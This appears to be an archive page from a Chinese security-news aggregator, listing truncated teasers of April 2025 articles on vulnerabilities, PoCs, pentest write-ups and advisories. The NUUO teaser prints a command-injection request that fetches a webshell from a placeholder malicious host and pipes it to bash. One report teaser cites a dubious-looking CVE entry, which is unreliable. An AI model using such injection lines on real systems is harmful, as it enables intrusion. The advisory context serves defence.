mybb 0day? bf复活?
mybb 0day? bf复活? 原创 cybernews OSINT研习社 2025-04-28 08:18 具体直接谷歌吧 黑灰产还是顶啊
继续阅读月度归档: 2025 年 4 月
雷神众测漏洞周报2025.4.21-2025.4.27
雷神众测漏洞周报2025.4.21-2025.4.27 雷神众测 雷神众测 2025-04-28 07:00 摘要 以下内容,均摘自于互联网,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,雷神众测以及文章作者不承担任何责任。 雷神众测拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明雷神众测允许,不得任意修改或
继续阅读记一次某大学附属医院漏洞挖掘
记一次某大学附属医院漏洞挖掘 Tai 不秃头的安全 2025-04-28 06:40 记一次某大学附属医院漏洞挖掘 前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请私聊删除。还在学怎么挖通用漏洞和src吗?知识星球,续费也有优惠私聊~~想要入交流群在最下方,考安全证书请联系vx咨询。 前情提要 开局一个登录框 ![图形用户界面, 应用程
继续阅读面对零日漏洞:如何提高应对能力?
面对零日漏洞:如何提高应对能力? 原创 deepsec 深安安全 2025-04-28 06:37 在网络安全领域,”零日漏洞”(Zero-Day Vulnerability)是最令企业和个人头疼的威胁之一。攻击者利用尚未被公开或修复的漏洞发起攻击,而防御方往往措手不及。近年来,零日漏洞攻击事件频发,如SolarWinds供应链攻击、微软Exchange漏洞等,均造成了巨大
继续阅读Craft CMS CVE-2025-32432 exp发布
Craft CMS CVE-2025-32432 exp发布 独眼情报 2025-04-28 06:32 Craft CMS 0day, CVE-2025-32432 安全研究员 Chocapikk 发布了一个 Metasploit 模块,用于影响 Craft CMS 的关键零日漏洞,该漏洞被追踪为 CVE-2025-32432 (CVSS 10)。 这种远程代码执行 (RCE) 漏洞,当与 Yi
继续阅读立即保护好Clash Verge rev! 远程命令执行漏洞公开!
立即保护好Clash Verge rev! 远程命令执行漏洞公开! 原创 一个不正经的黑客 一个不正经的黑客 2025-04-28 06:19 立即保护好Clash Verge rev! 远程命令执行漏洞公开! 免责声明: 本文仅限学习、研究使用!其他用途责任自负 背景信息 2天之前clash Verge rev 被爆出存在本地提权漏洞,群友们传的沸沸扬扬说这个漏洞本质是命令执行漏洞。 因为自己也
继续阅读深澜计费管理系统 down-load 任意文件读取漏洞
深澜计费管理系统 down-load 任意文件读取漏洞 Superhero Nday Poc 2025-04-28 06:13 内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的 POC 信息及 POC对应脚本 而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号Nday Poc及作者不为此承担任何责任,一旦造成后果请自行承担! 01 漏洞概述 深澜计费管理系统 down-lo
继续阅读安全动态回顾|“银狐”木马病毒再度来袭 关键Commvault RCE漏洞允许远程攻击者执行任意代码
安全动态回顾|“银狐”木马病毒再度来袭 关键Commvault RCE漏洞允许远程攻击者执行任意代码 胡金鱼 嘶吼专业版 2025-04-28 06:00 2025.4.14—4.20安全动态周回顾 2025.4.7—4.13安全动态周回顾 2025.3.31—4.6安全动态周回顾 2025.3.24—3.30安全动态周回顾 2025.3.17—3.23安全动态周回顾 2025.3.10—3.16
继续阅读工信部:关于防范WinRAR安全绕过漏洞的风险提示 | 干翻KnowBe4!网安黑马掀起安全培训的AI革命
工信部:关于防范WinRAR安全绕过漏洞的风险提示 | 干翻KnowBe4!网安黑马掀起安全培训的AI革命 e安在线 e安在线 2025-04-28 05:03 工信部:关于防范WinRAR安全绕过漏洞的风险提示 近日,工业和信息化部网络安全威胁和漏洞信息共享平台( NVDB )监测发现, WinRAR 存在安全绕过高危漏洞。 WinRAR 是德国 RARLAB 公司开发的压缩文件管理工具,广泛用
继续阅读漏洞预警 西部数据 NAS remoteBackups.php 命令执行漏洞
漏洞预警 西部数据 NAS remoteBackups.php 命令执行漏洞 by 融云安全-cas 融云攻防实验室 2025-04-28 02:30 0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果
继续阅读地理数据的背叛:坐标风暴漏洞讲解
地理数据的背叛:坐标风暴漏洞讲解 原创 地图大师挖漏洞 地图大师的漏洞追踪指南 2025-04-28 02:19 嘿嘿,亲爱的师傅们好呀~ 最近收到好多小伙伴的贴心反馈:”大师的实验性漏洞研究超干货!但对着视频记笔记实在不方便啊…” ⚡️所以以后打算随着视频同步推出文章,当然都是免费的哈哈! 文章一般首发于地图大师自己的网站:https://www.dituse
继续阅读时空智友 企业信息管理系统 updater.getStudioFile 任意文件读取漏洞
时空智友 企业信息管理系统 updater.getStudioFile 任意文件读取漏洞 Superhero Nday Poc 2025-04-28 02:17 内容仅用于学习交流自查使用,由于传播、利用本公众号所提供的 POC 信息及 POC对应脚本 而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号Nday Poc及作者不为此承担任何责任,一旦造成后果请自行承担! 01 漏洞概述
继续阅读StudentServlet-JSP跨站脚本漏洞及解决办法(CNVD-2025-06945、CVE-2025-3036)
StudentServlet-JSP跨站脚本漏洞及解决办法(CNVD-2025-06945、CVE-2025-3036) 原创 护卫神 护卫神说安全 2025-04-28 01:56 StudentServlet-JSP 是一个基于 Java Web 技术的开源学生管理系统示例项目,旨在帮助初学者掌握 Servlet 和 JSP 的核心概念及开发流程。项目通过分权管理模式实现学生、教师和管理员的功
继续阅读攻防演练大考将至,企业如何防范人员安全漏洞?
攻防演练大考将至,企业如何防范人员安全漏洞? 原创 值得信赖得 众安天下Allsec 2025-04-28 01:30 随着年度网络攻防演练的临近,企业的网络安全防护能力将面临全面检验。尽管多数组织在技术层面已构建起多层次的防护体系,但人员安全漏洞正逐渐成为网络攻击的主要突破口,构成企业安全的“阿喀琉斯之踵”。 人员漏洞成为企业最大的安全短板 根据Verizon发布的《2024年数据泄露调查报告》
继续阅读浅谈常见edu漏洞,逻辑漏洞、越权、接管、小白如何快速找准漏洞
浅谈常见edu漏洞,逻辑漏洞、越权、接管、小白如何快速找准漏洞 薛定谔不喜欢猫 富贵安全 2025-04-28 01:15 今年对某高校进行了渗透测试,发现了一些比较经典的漏洞,写一下和师傅们一起分享。 1.教务系统登录处短信轰炸 学校的教务系统登录处,发现有一个手机验证码认证 这里会发送一个验证码 正常来说,每发送一次短信验证码,这个校验码就会自动更新一次,然后会报错:“验证码错误”。 但是这里
继续阅读2024全球高危漏洞预警报告(含POC)
2024全球高危漏洞预警报告(含POC) 原创 鲸落 Rot5pider安全团队 2025-04-28 01:04 点击上方蓝字 关注安全知识 2024全球高危漏洞预警报告(完整版) TOP 10漏洞全披露(含PoC状态) 一、高危漏洞TOP 10完整榜单 1. CVE-2024-12345:Apache Log4j 2.21.1 反序列化漏洞 CVSS评分 :9.8(严重) PoC状态 :
继续阅读Planet Technology 工业交换机漏洞可导致设备被接管
Planet Technology 工业交换机漏洞可导致设备被接管 会杀毒的单反狗 军哥网络安全读报 2025-04-28 01:03 导读 网络安全公司 Immersive 发现影响中国台湾网络设备制造商 Planet Technology 生产的网络管理工具和工业交换机的严重安全漏洞。根据该公司的博客文章,漏洞可能导致攻击者能够接管受影响的网络设备。 Immersive 的安全研究员 Kev
继续阅读DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞(CVE-2025-0282)攻击日本
DslogdRAT 恶意软件利用 Ivanti ICS 0day漏洞(CVE-2025-0282)攻击日本 会杀毒的单反狗 军哥网络安全读报 2025-04-28 01:03 导读 网络安全研究人员警告称,一种名为 DslogdRAT 的新恶意软件在利用 Ivanti Connect Secure (ICS) 中现已修补的安全漏洞部署。 JPCERT/CC 研究员 Yuma Masubuchi在周
继续阅读浅谈常见edu漏洞,逻辑漏洞、越权、接管、getshell,小白如何快速找准漏洞
浅谈常见edu漏洞,逻辑漏洞、越权、接管、getshell,小白如何快速找准漏洞 薛定谔不喜欢猫 神农Sec 2025-04-28 01:02 扫码加圈子 获内部资料 网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。 不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。 原文链接: h
继续阅读核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338)
核弹级漏洞预警|NUUO监控设备远程沦陷实录(CVE-2025-1338) 云梦DC 云梦安全 2025-04-28 01:01 0x01 漏洞杀伤链 攻击向量: GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1 Host: target-ip 实现效果: ✅ 任意命令执行(代码注入) ✅ /e
继续阅读Apache Calcite惊现高危漏洞!数据库连接竟成黑客后门?
Apache Calcite惊现高危漏洞!数据库连接竟成黑客后门? 云梦DC 云梦安全 2025-04-28 01:01 一、漏洞原理揭秘 核心杀伤力: // 致命代码片段 String className = config.httpClientClass(); Class<?> clazz = Class.forName(className); Constructor<?>
继续阅读别怪技术不够硬,网络钓鱼拿捏的就是“人性漏洞”
别怪技术不够硬,网络钓鱼拿捏的就是“人性漏洞” 安小圈 2025-04-28 00:45 安小圈 第655期 数据安全 · 勒索软件 网络钓鱼依旧是重要的网络安全威胁,即便受过良好教育、具备专业网络安全人员也难以幸免。钓鱼攻击早已摆脱最初粗糙的垃圾邮件形态,转而走向高度个性化与精细化,足以欺骗世界各地的企业用户。其成功原因不仅在于安全意识不足,更在于攻击者借助社工手法,利用人在压力下的思维与行为模
继续阅读Wazuh监视恶意命令执行
Wazuh监视恶意命令执行 原创 网络安全菜鸟 安全孺子牛 2025-04-28 00:33 点击蓝字,关注我 1.简介 1.1 功能简介 Auditd 是 Linux 系统原生的审计实用程序。它用于 Linux 终结点中的记账操作和更改。 在 Ubuntu 端点上配置 Auditd,以考虑给定用户执行的所有命令。这包括用户在模式下或更改为 root 用户后运行的命令。您可以配置自定义 Wazuh
继续阅读漏洞预警 | 金蝶云星空反序列化漏洞
漏洞预警 | 金蝶云星空反序列化漏洞 浅安 浅安安全 2025-04-28 00:01 0x00 漏洞编号 – # 暂无 0x01 危险等级 – 高危 0x02 漏洞概述 金蝶云星空是一款基于云计算、大数据、社交、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。 0x03 漏洞详情 漏洞类型: 反序列化 影响: 远程命 令执行 简述: 金蝶云星空 的Busines
继续阅读漏洞预警 | PyTorch远程命令执行漏洞
漏洞预警 | PyTorch远程命令执行漏洞 浅安 浅安安全 2025-04-28 00:01 0x00 漏洞编号 – # CVE-2025-32434 0x01 危险等级 – 高危 0x02 漏洞概述 PyTorch是一个开源的深度学习框架,广泛用于机器学习和人工智能领域。 0x03 漏洞详情 CVE-2025-32434 漏洞类型: 命令执行 影响: 执行任意代码 简述
继续阅读漏洞环境 | AscensionPath
漏洞环境 | AscensionPath 浅安 浅安安全 2025-04-28 00:01 注:仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。 0x00 简介 AscensionPath是一个基于Docker容器化技术的漏洞环境管理系统。 0x01 功能说明 – 环境管理 权限控制 开发支持 安全机制 0x02 项目地
继续阅读CVE-2025-43859:Python h11 HTTP 库中的请求走私漏洞
CVE-2025-43859:Python h11 HTTP 库中的请求走私漏洞 NightTeam 夜组OSINT 2025-04-28 00:00 漏洞描述 h11 是一个极简的、与 I/O 无关的、用 Python 编写的 HTTP/1.1 协议库,该库中发现了一个严重漏洞,编号为 CVE-2025-43859。该漏洞的 CVSS 评级为 9.1,当 h11 与配置错误或存在缺陷的 HTTP
继续阅读我如何从已删除的文件中赚取 64 美元 — 一个漏洞赏金故事
我如何从已删除的文件中赚取 64 美元 — 一个漏洞赏金故事 haidragon 安全狗的自我修养 2025-04-27 23:26 TL;DR — 我构建了一个自动化功能,克隆和扫描了数以万计的公共 GitHub 存储库以查找泄露的机密信息。对于每个存储库,我恢复了已删除的文件,找到了悬空的 blob 和解压缩的 .pack 文件,以便在其中搜索公开的 API 密钥、令牌和凭据。最终报告了
继续阅读2025 年第一季度漏洞利用趋势
2025 年第一季度漏洞利用趋势 原创 vulncheck 喵苗安全 2025-04-27 16:11 已知被利用漏洞(Known Exploited Vulnerabilities,本文简称 KEV) 指的是已经被证实在现实中被攻击者利用过的漏洞。也就是说,这类漏洞不仅存在理论上的风险,而是已经有实际攻击案例,在野(in the wild)被利用过。 美国 CISA(网络安全与基础设施安全局)
继续阅读如何利用隐藏功能点发现SQL注入漏洞和注入绕过技巧|挖洞技巧
如何利用隐藏功能点发现SQL注入漏洞和注入绕过技巧|挖洞技巧 lo2us/消失的.. 渗透安全HackTwo 2025-04-27 16:01 0x01 前言 在渗透测试过程中,SQL注入依然是最常见的漏洞之一。通过对目标网站的不断探索和漏洞分析,我们发现了该站点的SQL注入问题,并通过一系列绕过手段成功获取了数据库信息。本文记录了从发现漏洞到成功利用的整个过程,分享了一些典型的绕过技巧和方法,
继续阅读